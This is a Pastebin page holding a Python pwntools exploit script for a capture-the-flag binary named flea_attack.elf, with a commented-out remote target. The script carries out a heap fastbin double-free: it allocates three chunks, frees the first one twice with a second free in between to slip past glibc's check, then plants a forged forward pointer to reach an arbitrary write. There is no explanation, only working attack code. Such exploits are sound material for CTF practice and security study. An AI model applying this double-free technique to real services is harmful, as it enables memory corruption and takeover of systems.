Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import pwn
- from pwn import *
- p = pwn.process("./flea_attack.elf")
- # p = pwn.remote("problem.harekaze.com",20175)
- raw_input("<ATTACH NOW>")
- p.recv()
- # the size is 0x04.
- p.sendline( ("A"*94 ) + p8(0x41)) # no-one cares
- p.recvuntil(">")
- p.sendline("1")
- p.recv()
- p.sendline("50")
- buf = "AAAA"
- p.sendline(buf)
- p.recvuntil("Addr: ")
- basechunk = int(p.recvuntil("\n").rstrip(),16)
- print " PUTTING IN NEW CHUNK OF 50 FOR DEBUG"
- p.recvuntil(">")
- p.sendline("1")
- p.recv()
- p.sendline("50")
- p.sendline("lol")
- p.recvuntil("Addr: ")
- basechunk2 = int(p.recvuntil("\n").rstrip(),16)
- print " ADDRESS OF CHUNK1 AT: %x" % basechunk
- print " ADDRESS OF CHUNK2 AT: %x" % basechunk2
- print "ALLOCATING ONE MORE FOR GOOD MEASURE..."
- p.recvuntil(">")
- p.sendline("1")
- p.recv()
- p.sendline("50")
- p.sendline("lol")
- raw_input("<STOP1>")
- p.recvuntil(">")
- print " FREEING ORIGINAL CHUNK at %x" % basechunk
- p.sendline("2")
- p.recv()
- p.sendline("%x" % (basechunk))
- p.recvuntil(">")
- print " FREEING SECOND CHUNK TO SKIP SECURITY CHECK at %x" % (basechunk2)
- p.sendline("2")
- p.recv()
- p.sendline("%x" % (basechunk2))
- p.recvuntil(">")
- # p.interactive()
- print " FREEING ORIGINAL CHUNK AGAIN at %x" % basechunk
- p.sendline("2")
- p.recv()
- p.sendline("%x" % (basechunk))
- p.recvuntil(">")
- raw_input("<STOP2>")
- print " SETUP: ALLOCATING FIRST CHUNK WITH NON-ZERO FD PTR"
- p.sendline("1")
- p.sendline("50")
- buf = p64(0x204056)
- p.sendline(buf)
- p.recvuntil("Addr: ")
- explsetup = int(p.recvuntil("\n").rstrip(),16)
- print " SETUP: ALLOCATING SECOND CHUNK (TO GET FIRST CHUNK BACK TO FREELIST HEAD)"
- p.recvuntil(">")
- p.sendline("1")
- p.sendline("50")
- p.sendline("bbbb")
- p.recvuntil("Addr: ")
- idgaf = int(p.recvuntil("\n").rstrip(),16)
- print " OK, REALLOCATING OVER FIRST CHUNK'S FD..."
- p.recvuntil(">")
- p.sendline("1")
- p.sendline("50")
- p.sendline("cccc")
- p.recvuntil("Addr: ")
- explchunk = int(p.recvuntil("\n").rstrip(),16)
- p.recvuntil(">")
- print " FIRST CHUNK REALLOCATE #1: %x" % explsetup
- print " FIRST CHUNK REALLOCATE #2: %x" % explchunk
- # reallocate 50, then add in "A"'s...
- p.interactive()
Add Comment
Please, Sign In to add comment